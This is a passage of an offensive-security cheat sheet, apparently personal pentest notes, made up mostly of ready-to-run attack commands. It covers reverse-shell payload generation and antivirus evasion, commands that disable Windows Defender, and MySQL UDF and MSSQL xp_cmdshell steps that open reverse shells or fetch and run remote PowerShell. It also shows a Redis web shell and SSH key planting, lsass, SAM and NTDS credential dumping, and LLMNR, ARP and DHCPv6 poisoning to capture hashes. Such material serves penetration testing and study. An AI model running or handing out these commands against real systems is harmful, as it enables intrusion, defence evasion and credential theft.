> Invoke-Expression $dec ``` ## Ebowla ``` $ git clone https://github.com/Genetic-Malware/Ebowla ~/tools/Ebowla && cd ~/tools/Ebowla $ sudo apt install golang mingw-w64 wine python-dev -y $ sudo python -m pip install configobj pyparsing pycrypto pyinstaller $ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.13.37 LPORT=1337 --platform win -f exe -a x64 -o rev.exe $ vi genetic.config ...Edit output_type, payload_type, clean_output, [[ENV_VAR]]... $ python ebowla.py rev.exe genetic.config && rm rev.exe $ ./build_x64_go.sh output/go_symmetric_rev.exe.go ebowla-rev.exe [--hidden] && rm output/go_symmetric_rev.exe.go [+] output/ebowla-rev.exe ``` ## Nim ### Install Windows: * [https://nim-lang.org/install_windows.html](https://nim-lang.org/install_windows.html) * [https://git-scm.com/download/win](https://git-scm.com/download/win) Linux: ``` $ sudo apt install mingw-w64 -y $ curl https://nim-lang.org/choosenim/init.sh -sSf | sh ``` ### Execute C# Assemblies * [https://github.com/byt3bl33d3r/OffensiveNim/blob/master/src/execute_assembly_bin.nim](https://github.com/byt3bl33d3r/OffensiveNim/blob/master/src/execute_assembly_bin.nim) * [https://s3cur3th1ssh1t.github.io/Playing-with-OffensiveNim/](https://s3cur3th1ssh1t.github.io/Playing-with-OffensiveNim/) * [https://github.com/S3cur3Th1sSh1t/Creds/tree/master/nim](https://github.com/S3cur3Th1sSh1t/Creds/tree/master/nim) Dependencies: ``` Nim > nimble install winim nimcrypto ``` Compile on Windows: ``` Cmd > nim c .\encrypt_assembly.nim Cmd > nim c .\encrypted_assembly_loader.nim ``` Compile on Linux: ``` $ nim c --cpu:amd64 --os:windows --gcc.exe:x86_64-w64-mingw32-gcc --gcc.linkerexe:x86_64-w64-mingw32-gcc encrypt_assembly.nim $ nim c --cpu:amd64 --os:windows --gcc.exe:x86_64-w64-mingw32-gcc --gcc.linkerexe:x86_64-w64-mingw32-gcc encrypted_assembly_loader.nim ``` Run: ``` Nim > .\encrypt_assembly.exe Passw0rd! SharpKatz.exe b64.txt Nim > .\encrypted_assembly_loader.exe Passw0rd! b64.txt --Command logonpasswords ``` ## Defender * [https://github.com/swagkarna/Defeat-Defender/blob/main/Defeat-Defender.bat](https://github.com/swagkarna/Defeat-Defender/blob/main/Defeat-Defender.bat) Disable real-time protection (proactive): ``` PS > Set-MpPreference -DisableRealTimeMonitoring $true ``` Disable scanning all downloaded files and attachments, disable AMSI (reactive): ``` PS > Set-MpPreference -DisableIOAVProtection $true ``` Remove signatures (if Internet connection is present, they will be downloaded again): ``` PS > "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All Or Cmd > "%PROGRAMFILES%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All ``` Add path to exclusions: ``` PS > $mimi = "C:\Users\snovvcrash\music\mimi\x64\mimikatz.exe" PS > Add-MpPreference -ExclusionPath $mimi -AttackSurfaceReductionOnlyExclusions $mimi ``` Download stager without triggering Defender to scan it: ``` PS > "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -DownloadFile -Url http://127.0.0.1/met.exe -Path C:\Users\snovvcrash\music\met.exe ``` Coerce the victim machine to reach the attacker (to steal Net-NTLM): ``` Cmd > C:\PROGRA~1\WINDOW~1\MpCmdRun.exe -Scan -ScanType 3 -File '\\10.10.13.37\share\file' ``` ## Obfuscate Mimikatz * [https://s3cur3th1ssh1t.github.io/Bypass-AMSI-by-manual-modification-part-II/](https://s3cur3th1ssh1t.github.io/Bypass-AMSI-by-manual-modification-part-II/) * [https://s3cur3th1ssh1t.github.io/Building-a-custom-Mimikatz-binary/](https://s3cur3th1ssh1t.github.io/Building-a-custom-Mimikatz-binary/) # Application Whitelist Bypass * [https://bohops.com/2018/01/31/vsto-the-payload-installer-that-probably-defeats-your-application-whitelisting-rules/](https://bohops.com/2018/01/31/vsto-the-payload-installer-that-probably-defeats-your-application-whitelisting-rules/) * [https://vanmieghem.io/stealth-outlook-persistence/](https://vanmieghem.io/stealth-outlook-persistence/) # AppLocker Bypass * [https://github.com/api0cradle/UltimateAppLockerByPassList](https://github.com/api0cradle/UltimateAppLockerByPassList) * [https://www.hackplayers.com/2018/12/english-cor-profilers-bypassing-windows.html](https://www.hackplayers.com/2018/12/english-cor-profilers-bypassing-windows.html) * [https://0xdf.gitlab.io/2019/03/15/htb-ethereal-cor.html](https://0xdf.gitlab.io/2019/03/15/htb-ethereal-cor.html) # Auth Brute Force ## Hydra ``` $ hydra -V -t 20 -f -I -L logins.lst -P /usr/share/john/password.lst 127.0.0.1 -s 8888 smtp $ hydra -V -t 20 -f -I -l admin -P /usr/share/john/password.lst 127.0.0.1 -s 8888 ftp ``` ## Patator ``` $ patator smtp_login host=127.0.0.1 port=8888 user=FILE0 password=FILE1 0=logins.lst 1=/usr/share/john/password.lst -x ignore:mesg='(515) incorrect password or account name' -x free=user:code=0 $ patator ftp_login host=127.0.0.1 port=8888 user=admin password=FILE0 0=/usr/share/john/password.lst -x ignore:mesg='Login incorrect.' -x free=user:code=0 ``` # Constrained Language Mode Bypass In-place functions: ``` PS > whoami The term 'whoami.exe' is not recognized as the name of cmdlet... PS > &{ whoami } megacorp\snovvcrash ``` # DBMS ## MySQL/MariaDB Basic CLI syntax: ``` $ mysql -h 127.0.0.1 -P 3306 -u snovvcrash -p'Passw0rd!' -e 'show databases;' ``` Basic enumeration: ``` mysql> show GRANTS; mysql> select @@hostname, @@tmpdir, @@version, @@version_compile_machine, @@plugin_dir; ``` ### UDF PrivEsc * [https://www.exploit-db.com/exploits/1518](https://www.exploit-db.com/exploits/1518) * [https://github.com/mysqludf/lib_mysqludf_sys](https://github.com/mysqludf/lib_mysqludf_sys) * [https://gist.github.com/snovvcrash/efeb79d3e2648ec5009dd2ea7052f8b9](https://gist.github.com/snovvcrash/efeb79d3e2648ec5009dd2ea7052f8b9) Install dependencies: ``` $ sudo apt install libmariadbclient-dev -y $ git clone https://github.com/mysqludf/lib_mysqludf_sys && cd lib_mysqludf_sys ``` Compile `.so` library (x86 example): ``` $ sudo apt install libc6-dev-i386 -y $ gcc lib_mysqludf_sys.c -o lib_mysqludf_sys_x86.so -m32 -Wl,--hash-style=both -fPIC -Wall -I/usr/include/mariadb/server -I/usr/include/mariadb/server/private -I. -shared -L/usr/lib/x86_64-linux-gnu/libstdc++.so.6 ``` Compile `.so` library (x64 example): ``` $ gcc lib_mysqludf_sys.c -o lib_mysqludf_sys_x64.so -m64 -Wl,--hash-style=both -fPIC -Wall -I/usr/include/mariadb/server -I/usr/include/mariadb/server/private -I. -shared -L/usr/lib/x86_64-linux-gnu/libstdc++.so.6 ``` Convert library to hex: ``` $ xxd -p lib_mysqludf_sys.so | tr -d '\n' ``` Load library and call user-defined `sys_exec` function with a rev-shell. MySQL (x86 example): ``` mysql> use mysql; mysql> create table pwn(line blob); mysql> insert into pwn values(load_file('/tmp/lib_mysqludf_sys_x86.so')); mysql> select * from pwn into dumpfile '/usr/lib/lib_mysqludf_sys_x86.so'; Or load it from hex: mysql> set @pwn = '7F..00'; mysql> select unhex(@pwn) into dumpfile '/usr/lib/lib_mysqludf_sys_x86.so'; mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys_x86.so'; mysql> select sys_exec("/bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/1337 0>&1'"); ``` MariaDB (x64 example): ``` MariaDB> show variables like '%plugin%'; # get lib path MariaDB> use mysql; MariaDB> create table pwn(line blob); MariaDB> insert into pwn values(load_file('/tmp/lib_mysqludf_sys_x64.so')); MariaDB> select * from pwn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_x64.so'; Or load it from hex: MariaDB> set @pwn = 0x7F..00; MariaDB> select binary @pwn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_x64.so'; MariaDB> create function sys_exec returns integer soname 'lib_mysqludf_sys_x64.so'; MariaDB> select sys_exec("/bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/1337 0>&1'"); ``` ## Oracle * [https://xakep.ru/2015/04/07/195-oracle-db/](https://xakep.ru/2015/04/07/195-oracle-db/) * [https://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf](https://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf) * [https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener](https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener) * [http://www.red-database-security.com/wp/oracle_cheat.pdf](http://www.red-database-security.com/wp/oracle_cheat.pdf) ### odat * [https://github.com/quentinhardy/odat/releases](https://github.com/quentinhardy/odat/releases/) Install manually (depreciated): * [https://github.com/quentinhardy/odat#installation-optional-for-development-version](https://github.com/quentinhardy/odat#installation-optional-for-development-version) ``` $ git clone https://github.com/quentinhardy/odat ~/tools/odat && cd ~/tools/odat $ git submodule init && git submodule update $ sudo apt install libaio1 python3-dev alien python3-pip $ wget https://download.oracle.com/otn_software/linux/instantclient/19600/oracle-instantclient19.6-basic-19.6.0.0.0-1.x86_64.rpm $ wget https://download.oracle.com/otn_software/linux/instantclient/19600/oracle-instantclient19.6-devel-19.6.0.0.0-1.x86_64.rpm $ sudo alien --to-deb *.rpm $ sudo dpkg -i *.deb $ vi /etc/profile ... export ORACLE_HOME=/usr/lib/oracle/19.6/client64/ export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib export PATH=${ORACLE_HOME}bin:$PATH ... $ pip3 install cx_Oracle $ python3 odat.py -h ``` ### TNS Poison * [http://www.joxeankoret.com/download/tnspoison.pdf](http://www.joxeankoret.com/download/tnspoison.pdf) * [https://www.youtube.com/watch?v=0IKltOBXiII](https://www.youtube.com/watch?v=0IKltOBXiII) Check with Nmap: ``` $ sudo wget https://gist.githubusercontent.com/JukArkadiy/3d6cff222d1b87e963e7/raw/fbe6fe17a9bca6ce839544b7afb2276fff061d46/oracle-tns-poison.nse -O /usr/share/nmap/scripts/oracle-tns-poison.nse $ sudo nmap -v -n -Pn -sV --script oracle-tns-poison.nse -oA CVE-2014-0160/nmap/tns-poison -p1521 10.10.13.37 ``` Brute SID with MSF: ``` msf > use use auxiliary/scanner/oracle/sid_brute ``` Brute SID with odat: ``` $ odat sidguesser -s 10.10.13.37 -p 1521 ``` Exploit with odat: * [https://github.com/quentinhardy/odat/wiki/tnspoison](https://github.com/quentinhardy/odat/wiki/tnspoison) ``` $ odat tnspoison -s 10.10.13.37 -d <SID> --test-module $ odat tnspoison -s 10.10.13.37 -d <SID> --poison ``` ## MS SQL ### Enable xp_cmdshell ``` 1> EXEC sp_configure 'show advanced options', 1 2> GO 1> RECONFIGURE 2> GO 1> EXEC sp_configure 'xp_cmdshell', 1 2> GO 1> RECONFIGURE 2> GO 1> xp_cmdshell whoami 2> GO ``` ### sqsh ``` $ sqsh -S 127.0.0.1 -U 'MEGACORP\snovvcrash' -P 'Passw0rd!' 1> xp_cmdshell "powershell -nop -exec bypass IEX(New-Object Net.WebClient).DownloadString('http://10.10.13.37/rev.ps1')" 2> GO ``` ### mssqlclient.py ``` $ mssqlclient.py MEGACORP/snovvcrash:'Passw0rd!'@127.0.0.1 [-windows-auth] SQL> xp_cmdshell "powershell -nop -exec bypass IEX(New-Object Net.WebClient).DownloadString(\"http://10.10.13.37/rev.ps1\")" ``` ### mssql-cli * [https://github.com/dbcli/mssql-cli](https://github.com/dbcli/mssql-cli) ``` $ python -m pip install mssql-cli $ mssql-cli -S 127.0.0.1 -U 'MEGACORP\snovvcrash' -P 'Passw0rd!' ``` ### DBeaver * [DBeaver Community](https://dbeaver.io/) ### DbVisualizer * [DbVisualizer](https://www.dbvis.com/) ## SQLite ``` SELECT tbl_name FROM sqlite_master WHERE type='table' AND tbl_name NOT like 'sqlite_%'; SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='secret_database'; SELECT username,password FROM secret_database; ``` ## Redis * [https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html](https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html) * [2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf](https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf) * [https://github.com/holys/redis-cli/releases](https://github.com/holys/redis-cli/releases) * [https://github.com/antirez/redis](https://github.com/antirez/redis) Check for anonymous login: ``` $ nc 127.0.0.1 6379 Escape character is '^]'. echo "Hey, no AUTH required!" $21 Hey, no AUTH required! quit +OK Connection closed by foreign host. ``` Sensitive injection points for testing: ``` /var/www/html /home/redis/.ssh /var/lib/redis/.ssh /var/spool/cron/crontabs /var/spool/cron $ for dname in `cat dirs.txt`; do redis-cli -h 127.0.0.1 config set dir $dname | grep OK && echo $dname; done ``` ### Web Shell * [https://book.hacktricks.xyz/pentesting/6379-pentesting-redis](https://book.hacktricks.xyz/pentesting/6379-pentesting-redis) ``` $ redis-cli -h 127.0.0.1 flushall $ redis-cli -h 127.0.0.1 set pwn '<?php system($_REQUEST['cmd']); ?>' $ redis-cli -h 127.0.0.1 config set dbfilename shell.php $ redis-cli -h 127.0.0.1 config set dir /var/www/html $ redis-cli -h 127.0.0.1 save ``` ### SSH Public Key * [https://github.com/Avinash-acid/Redis-Server-Exploit](https://github.com/Avinash-acid/Redis-Server-Exploit) ``` $ ssh-keygen -t ecdsa -s 521 -f key $ (echo -e "\n\n"; cat key.pub; echo -e "\n\n") > key.txt $ redis-cli -h 127.0.0.1 flushall $ cat foo.txt | redis-cli -h 127.0.0.1 -x set pwn $ redis-cli -h 127.0.0.1 config set dbfilename authorized_keys $ redis-cli -h 127.0.0.1 config set dir /var/lib/redis/.ssh $ redis-cli -h 127.0.0.1 save ``` # Docker List all running containers: ``` $ docker ps -a ``` Stop all running containers: ``` $ docker stop `docker container ls -aq` ``` Remove stopped containers: ``` $ docker rm -v `docker container ls -aq -f status=exited` ``` Remove all images: ``` $ docker rmi `docker images -aq` ``` Attach to a running container: ``` $ docker exec -it <CONTAINER> /bin/bash ``` Unsorted: ``` $ docker start -ai <CONTAINER> $ docker cp project/. <CONTAINER>:/root/project $ docker run --rm -it <CONTAINER> --name <NAME> ubuntu bash $ docker build -t <USERNAME>/<IMAGE> . ``` ## Installation ### Linux #### docker-engine ``` $ sudo apt install apt-transport-https ca-certificates curl gnupg-agent software-properties-common -y (Ubuntu) $ curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add - (Kali) $ curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add - [$ sudo apt-key fingerprint 0EBFCD88] (Ubuntu) $ sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" (Kali) $ echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list $ sudo apt update [$ apt-cache policy docker-ce] $ sudo apt install docker-ce -y [$ sudo systemctl status docker] $ sudo usermod -aG docker ${USER} relogin [$ docker run --rm hello-world] ``` #### docker-compose * [https://docs.docker.com/compose/install/#install-compose-on-linux-systems](https://docs.docker.com/compose/install/#install-compose-on-linux-systems) ``` $ sudo curl -L "https://github.com/docker/compose/releases/download/1.27.4/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose $ sudo chmod +x /usr/local/bin/docker-compose $ sudo ln -s /usr/local/bin/docker-compose /usr/bin/docker-compose ``` # Dump Credentials ## lsass.exe ### LOLBAS #### comsvcs.dll * [https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#comsvcs-dll](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#comsvcs-dll) ``` PS C:\Windows\System32 > Get-Process lsass PS C:\Windows\System32 > .\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 940 C:\temp\lsass.dmp full ``` #### ProcDump * [https://docs.microsoft.com/en-us/sysinternals/downloads/procdump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) * [https://download.sysinternals.com/files/Procdump.zip](https://download.sysinternals.com/files/Procdump.zip) Dump and parse: ``` PS > .\procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp $ pypykatz lsa minidump lsass.dmp > lsass-pypykatz.minidump Or mimikatz # sekurlsa::minidump lsass.dmp ``` Grep for secrets: ``` (mimikatz) $ grep '* Username : ' lsass-mimikatz.minidump -A2 | grep -e Username -e Password -e NTLM | grep -v null | xclip -i -sel c (pypykatz) $ grep -P '\tusername ' lsass-pypykatz.minidump -A2 | grep -e username -e password | grep -v None | xclip -i -sel c $ grep -P 'Username: ' lsass-pypykatz.minidump -A4 | grep -e Username -e Domain -e NT | grep -v None | xclip -i -sel c ``` #### Silent Process Exit * [https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/](https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/) * [https://github.com/deepinstinct/LsassSilentProcessExit](https://github.com/deepinstinct/LsassSilentProcessExit) ### Mimikatz In case of Windows 10 version 1803-1809 use [Mimikatz v2.1.1](https://github.com/gentilkiwi/mimikatz/files/4167347/mimikatz_trunk.zip), see [Key import error](https://github.com/gentilkiwi/mimikatz/issues/248): ``` Cmd > .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit" ``` #### kiwi ``` meterpreter > getsystem meterpreter > load kiwi meterpreter > creds_msv meterpreter > creds_all meterpreter > lsa_dump_secrets meterpreter > kiwi_cmd '"privilege::debug" "sekurlsa::logonpasswords full" "exit"' ``` ### Reusing Open Handles * [https://skelsec.medium.com/duping-av-with-handles-537ef985eb03](https://skelsec.medium.com/duping-av-with-handles-537ef985eb03) * [https://github.com/jfmaes/SharpHandler](https://github.com/jfmaes/SharpHandler) ### Remotely * [https://github.com/G0ldenGunSec/SharpSecDump](https://github.com/G0ldenGunSec/SharpSecDump) ## SAM ### Mimikatz ``` PS > Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "log sam.txt" "lsadump::sam" "exit"' ``` ## NTDS + SAM Locate `diskshadow.exe`: ``` cmd /c where /R C:\ diskshadow.exe ``` Create shadow volume: ``` powershell -c "Add-Content add_vol.txt 'set context persistent nowriters'" powershell -c "Add-Content add_vol.txt 'set metadata C:\Windows\Temp\meta.cab'" powershell -c "Add-Content add_vol.txt 'set verbose on'" powershell -c "Add-Content add_vol.txt 'begin backup'" powershell -c "Add-Content add_vol.txt 'add volume c: alias DCROOT'" powershell -c "Add-Content add_vol.txt 'create'" powershell -c "Add-Content add_vol.txt 'expose %DCROOT% w:'" powershell -c "Add-Content add_vol.txt 'end backup'" cmd /c diskshadow.exe /s add_vol.txt ``` ``` // add_vol.txt set context persistent nowriters set metadata C:\Windows\Temp\meta.cab set verbose on begin backup add volume c: alias DCROOT create expose %DCROOT% w: end backup ``` Exfiltrate over SMB: ``` mkdir C:\smb_pentest copy w:\Windows\NTDS\ntds.dit C:\smb_pentest\ntds.dit cmd /c reg.exe save hklm\system C:\smb_pentest\system.hive cmd /c reg.exe save hklm\sam C:\smb_pentest\sam.hive cmd /c reg.exe save hklm\security C:\smb_pentest\security.hive cmd /c net share pentest=c:\smb_pentest /GRANT:"Everyone,FULL" $ smbclient.py 'snovvcrash:[email protected]' > use pentest > get ntds.dit > get system.hive > get sam.hive > get security.hive ``` Delete shadow volume: ``` powershell -c "Add-Content delete_vol.txt 'set context persistent nowriters'" powershell -c "Add-Content delete_vol.txt 'set metadata C:\Windows\Temp\meta.cab'" powershell -c "Add-Content delete_vol.txt 'set verbose on'" powershell -c "Add-Content delete_vol.txt 'unexpose w:'" powershell -c "Add-Content delete_vol.txt 'delete shadows volume c:'" powershell -c "Add-Content delete_vol.txt 'reset'" cmd /c diskshadow.exe /s delete_vol.txt ``` ``` // delete_vol.txt set context persistent nowriters set metadata C:\Windows\Temp\meta.cab set verbose on unexpose w: delete shadows volume c: reset ``` Clean up: ``` cmd /c net share pentest /delete rm -re -fo C:\smb_pentest rm C:\Windows\Temp\meta.cab rm add_vol.txt rm delete_vol.txt ``` Parse secrets: ``` $ secretsdump.py [-pwd-last-set] [-user-status] [-history] -sam sam.hive -system system.hive -security security.hive -ntds ntds.dit LOCAL ``` ## master.mdf * [https://xpnsec.tumblr.com/post/145350063196/reading-mdf-hashes-with-powershell](https://xpnsec.tumblr.com/post/145350063196/reading-mdf-hashes-with-powershell) * [https://github.com/xpn/Powershell-PostExploitation/tree/master/Invoke-MDFHashes](https://github.com/xpn/Powershell-PostExploitation/tree/master/Invoke-MDFHashes) * [https://www.nucleustechnologies.com/blog/mdf-file-location-in-sql-server-2014-2016-2017/](https://www.nucleustechnologies.com/blog/mdf-file-location-in-sql-server-2014-2016-2017/) ``` PS > Get-MDFHashes -mdf C:\Invoke-MDFHashes\master.mdf ``` ## DPAPI Master keys locations (hidden files, need `-Force`): ``` PS > ls -fo C:\Users\snovvcrash\AppData\Roaming\Microsoft\Protect\ (%appdata%\Microsoft\Protect\) PS > ls -fo C:\Users\snovvcrash\AppData\Local\Microsoft\Protect\ (%localappdata%\Microsoft\Protect\) ``` Credential files locations (hidden files, need `-Force`): ``` PS > ls -fo C:\Users\snovvcrash\AppData\Roaming\Microsoft\Credentials\ (%appdata%\Microsoft\Credentials\) PS > ls -fo C:\Users\snovvcrash\AppData\Local\Microsoft\Credentials\ (%localappdata%\Microsoft\Credentials\) ``` Unhide files: ``` PS > cmd /c "attrib -h -s 00ff00ff-00ff-00ff-00ff-00ff00ff00ff PS > cmd /c "attrib -h -s 00ff00ff00ff00ff00ff00ff00ff00ff" ``` ### Mimikatz * [https://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/](https://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/) Decrypt manually offline with known plaintext password: ``` mimikatz # dpapi::masterkey /in:00ff00ff-00ff-00ff-00ff-00ff00ff00ff /sid:S-1-5-21-4124311166-4116374192-336467615-500 /password:Passw0rd! mimikatz # dpapi::cache mimikatz # dpapi::cred /in:00ff00ff00ff00ff00ff00ff00ff00ff ``` ### SharpDPAPI * [https://github.com/GhostPack/SharpDPAPI](https://github.com/GhostPack/SharpDPAPI) * [https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-SharpDPAPI.ps1](https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-SharpDPAPI.ps1) ``` PS > .\SharpDPAPI.exe triage /password:Passw0rd! PS > .\SharpDPAPI.exe machinetriage [/password:Passw0rd!] ``` ## Credential Manager ### Mimikatz ``` Cmd > .\mimikatz.exe "privilege::debug" "vault::cred /patch" "exit" ``` # Engagement ``` $ cd ~/ws/ # workspace $ mkdir -p discover/{nmap,services} enum/bloodhound/bloodhound.py loot/ log/ screenshots/ shells/ tickets/ traffic/ ``` ## Network Config ``` $ ifconfig eth0 $ route -n $ cat /etc/resolve.conf $ arp -a ``` ## Network Attacks ### Sniff Traffic #### tcpdump While connected via SSH: ``` $ tcpdump -i eth0 -w dump.pcap -s0 'not tcp port 22' & ``` #### Wireshark * [https://research.801labs.org/cracking-an-ntlmv2-hash/](https://research.801labs.org/cracking-an-ntlmv2-hash/) ##### Filters Broadcast/multicast, IPv6 packets: ``` ssdp || arp || llmnr || nbns || mdns || icmpv6 || dhcpv6 ``` Arpspoof: ``` (http || ftp || smb || smb2 || ldap) && ip.src == VICTIM_10.0.0.5 ``` ### LLMNR/NBNS Poisoning #### Responder * [https://github.com/SpiderLabs/Responder](https://github.com/SpiderLabs/Responder) * [https://github.com/lgandx/Responder](https://github.com/lgandx/Responder) * [https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/) * [https://markclayton.github.io/where-are-my-hashes-responder-observations.html](https://markclayton.github.io/where-are-my-hashes-responder-observations.html) ``` $ git clone https://github.com/lgandx/Responder $ sudo ./Responder.py -I eth0 -wfrd -P -v $ head -n 1 logs/*.txt | grep -v -e logs -e '^$' -e anonymous | sort -u -t: -k1,1 > ~/ws/loot/net-ntlmv2.responder $ sort -u -t: -k1,1 ~/ws/loot/net-ntlmv2.responder >> ~/ws/loot/net-ntlmv2.txt && rm ~/ws/loot/net-ntlmv2.responder ``` #### Inveigh * [https://github.com/Kevin-Robertson/Inveigh](https://github.com/Kevin-Robertson/Inveigh) ``` PS > Invoke-Inveigh [-IP '10.10.13.37'] -ConsoleOutput Y -FileOutput Y -NBNS Y -mDNS Y -Proxy Y -MachineAccounts Y ``` ##### InveighZero * [https://github.com/Kevin-Robertson/InveighZero](https://github.com/Kevin-Robertson/InveighZero) * [https://github.com/Flangvik/SharpCollection](https://github.com/Flangvik/SharpCollection) ``` PS > .\inveighzero.exe -FileOutput Y -NBNS Y -mDNS Y -Proxy Y -MachineAccounts Y -DHCPv6 Y -LLMNRv6 Y [-Elevated N] ``` ### ARP Spoofing Enable IP forwarding: ``` $ sudo sysctl -w net.ipv4.ip_forward=1 (sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward') (edit /etc/sysctl.conf "net.ipv4.ip_forward = 1" to make it permanent) ``` #### arpspoof [dsniff] * [https://github.com/tecknicaltom/dsniff](https://github.com/tecknicaltom/dsniff) Install: ``` $ sudo apt install dsniff -y ``` Fire up the attack with Wireshark (filter `ip.src == VICTIM_10.0.0.5`) running: ``` $ sudo arpspoof -c both -t VICTIM_10.0.0.5 GATEWAY_10.0.0.1 ``` #### bettercap * [https://github.com/bettercap/bettercap](https://github.com/bettercap/bettercap) * [https://www.bettercap.org/modules/](https://www.bettercap.org/modules/) * [https://linuxhint.com/install-bettercap-on-ubuntu-18-04-and-use-the-events-stream/](https://linuxhint.com/install-bettercap-on-ubuntu-18-04-and-use-the-events-stream/) * [https://hackernoon.com/man-in-the-middle-attack-using-bettercap-framework-hd783wzy](https://hackernoon.com/man-in-the-middle-attack-using-bettercap-framework-hd783wzy) * [https://www.cyberpunk.rs/bettercap-usage-examples-overview-custom-setup-caplets](https://www.cyberpunk.rs/bettercap-usage-examples-overview-custom-setup-caplets) Deb dependencies (Ubuntu 18.04 LTS): * [libpcap0.8_1.8.1-6ubuntu1_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-main-amd64/libpcap0.8_1.8.1-6ubuntu1_amd64.deb.html) * [libpcap0.8-dev_1.8.1-6ubuntu1_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-main-amd64/libpcap0.8-dev_1.8.1-6ubuntu1_amd64.deb.html) * [libpcap-dev_1.8.1-6ubuntu1_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-main-amd64/libpcap-dev_1.8.1-6ubuntu1_amd64.deb.html) * [pkg-config_0.29.1-0ubuntu2_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-main-amd64/pkg-config_0.29.1-0ubuntu2_amd64.deb.html) * [libnetfilter-queue1_1.0.2-2_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-universe-amd64/libnetfilter-queue1_1.0.2-2_amd64.deb.html) * [libnfnetlink-dev_1.0.1-3_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-main-amd64/libnfnetlink-dev_1.0.1-3_amd64.deb.html) * [libnetfilter-queue-dev_1.0.2-2_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-universe-amd64/libnetfilter-queue-dev_1.0.2-2_amd64.deb.html) ### DHCPv6 Spoofing #### mitm6 * [https://github.com/fox-it/mitm6](https://github.com/fox-it/mitm6) * [https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/](https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/) * [https://intrinium.com/mitm6-pen-testing/](https://intrinium.com/mitm6-pen-testing/) Install: ``` $ git clone https://github.com/fox-it/mitm6 ~/tools/mitm6 && cd ~/tools/mitm6 $ python3 setup.py install Or $ pipx install -f "git+https://github.com/fox-it/mitm6.git" ``` Run: ``` $ sudo smbserver.py -smb2support share `pwd` | tee -a ~/ws/log/mitm6-smbserver.out $ sudo mitm6.py -i eth0 -d megacorp.local --ignore-nofqdn $ cat ~/ws/log/mitm6-smbserver.out | grep 'authenticated successfully' -A1 | grep aaaaaaaaaaaaaaaa | cut -c 5- | grep -v '\$' > ~/ws/loot/net-ntlmv2.mitm6 $ sort -u -t: -k1,1 ~/ws/loot/net-ntlmv2.mitm6 >> ~/ws/loot/net-ntlmv2.txt && rm ~/ws/loot/net-ntlmv2.mitm6 $ cat ~/ws/log/mitm6-smbserver.out | grep 'authenticated successfully' -A1 | grep aaaaaaaaaaaaaaaa | grep '\$' | cut -c 5- | sort -u -t: -k1,1 ``` ##### Attack vectors Grab hashes with `smbserver.py` (passive): 1. `mitm6.py` poisons IPv6 DNS entries for all hosts in the `/24` network. 2. Victims start to use attacker's machine as the primary DNS server. 3. `mitm6.py` on the attacker's machine acts like a rogue DNS server and responds with the attacker's IP for all incoming queries. 4. `smbserver.py` collects hashes during SMB requests from victims. Relay authentication with ntlmrelayx.py (active): 1. `mitm6.py` poisons IPv6 DNS entries for all hosts in the `/24` network. 2. Victims start to use attacker's machine as the primary DNS server. 3. `mitm6.py` on the attacker's machine acts like a rogue DNS server, `ntlmrelayx.py` serves a malicious WPAD file with an inexistent hostname (which will be resolved to the attacker's IP anyway) 